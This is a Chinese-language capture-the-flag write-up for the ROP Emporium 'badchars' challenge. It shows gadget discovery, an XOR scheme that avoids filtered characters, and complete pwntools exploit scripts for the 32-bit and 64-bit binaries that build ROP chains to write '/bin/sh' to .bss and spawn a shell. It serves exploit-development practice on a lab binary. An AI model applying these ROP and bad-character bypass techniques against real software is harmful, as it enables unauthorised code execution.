ROP Emporium: https://ropemporium.com/challenge/badchars.html
32位
日常 checksec,开了NX
ida 查看,pwnme 函数,进入 usefulFunction 函数,发现 system("/bin/ls") ,但是参数不对,需要自己将 '/bin/sh' 写入 bss 段
pwnme
usefulFunction
system 地址
system
bss 段地址
在 ida 里还找到 checkBadchars 函数,可知当我们输入特定的字符 b、i、c、/、空格、f、n、g 时,会进入这个函数将字符转为其他的值,这样会对要写入的 '/bin/sh' 造成影响,所以需要想办法绕过这个函数。
checkBadchars
checkBadchars
参考 https://www.jianshu.com/p/5b9abeca9308
这里用 xor 对要输入的 '/bin/sh' 加密,成功传入参数后再进行解密调用
首先找可以进行异或的数字,因为可能会有进行异或后还出现特定字符的数字
binsh = '/bin/sh\x00'
badchar = [98, 105, 99, 47, 32, 102, 110, 115]
xornum = 1
while 1:
for x in binsh:
tem = ord(x) ^ xornum
if tem in badchar:
xornum += 1
break
if x=='\x00':
print xornum
xornum += 1
if xornum == 10:
break
#运行
#printf 2 3 5 9(这里利用 2 进行异或)
用 gdb 爆个偏移
利用 ROPgadget 找可用的 gadget
$ ROPgadget --binary badchars32 --only 'mov|pop|ret|xor'
这里用
0x08048893 : mov dword ptr [edi], esi ; ret
0x08048899 : pop esi ; pop edi ; ret
0x08048896 : pop ebx ; pop ecx ; ret
0x08048890 : xor byte ptr [ebx], cl ; ret
还需要注意32位程序 '/bin/sh' 需要分两次传入
exp
#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *
p = process('./badchars32')
system = 0x080484E0
bss = 0x0804A040
mov_edi_esi = 0x08048893
pop_esi_edi = 0x08048899
pop_ebx_ecx = 0x08048896
xor_ebx_cl = 0x08048890
binsh = '/bin/sh\x00'
xorbinsh = ''
for i in binsh:
xorbinsh += chr(ord(i) ^ 2) #加密
'''
#加密
badchars = [98,105,99,47,32,102,110,115]
binsh = '/bin/sh\x00'
xor_byte = 1
while 1:
xorbinsh = ''
for i in binsh:
a = ord(i) ^ xor_byte
if a in badchars:
xor_byte += 1
break
else:
xorbinsh += chr(a)
if len(xorbinsh) == 8:
break
'''
payload = 'A' * 44
payload += p32(pop_esi_edi)
payload += xorbinsh[0:4]
payload += p32(bss)
payload += p32(mov_edi_esi)
payload += p32(pop_esi_edi)
payload += xorbinsh[4:8]
payload += p32(bss+4)
payload += p32(mov_edi_esi)
#解密
for x in range(0,len(xorbinsh)):
payload += p32(pop_ebx_ecx)
payload += p32(bss + x)
payload += p32(2)
payload += p32(xor_ebx_cl)
payload += p32(system)
payload += p32(0)
payload += p32(bss)
p.recvuntil('> ')
p.sendline(payload)
p.interactive()
64位
思路与32位一致
由于是64位程序,所以 '/bin/sh' 不需要分开写
system 地址
bss 段
用 gdb 爆个偏移
利用 ROPgadget 找可用的 gadget
$ ROPgadget --binary badchars --only 'mov|pop|ret|xor'
这里用
0x0000000000400b39 : pop rdi ; ret
0x0000000000400b34 : mov qword ptr [r13], r12 ; ret
0x0000000000400b3b : pop r12 ; pop r13 ; ret
0x0000000000400b40 : pop r14 ; pop r15 ; ret
0x0000000000400b30 : xor byte ptr [r15], r14b ; ret
exp
#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *
p = process('./badchars')
system = 0x04006F0
bss = 0x0601080
mov_r13_r12 = 0x0400b34
pop_r12_r13 = 0x0400b3b
pop_r14_r15 = 0x0400b40
xor_r15_r14b = 0x0400b30
pop_rdi = 0x0400b39
binsh = '/bin/sh\x00'
xorbinsh = ''
for i in binsh:
xorbinsh += chr(ord(i) ^ 2)
payload = 'A' * 40
payload += p64(pop_r12_r13)
payload += xorbinsh
payload += p64(bss)
payload += p64(mov_r13_r12)
for x in range(0,len(xorbinsh)):
payload += p64(pop_r14_r15)
payload += p64(2)
payload += p64(bss + x)
payload += p64(xor_r15_r14b)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(system)
p.recvuntil('> ')
p.sendline(payload)
p.interactive()
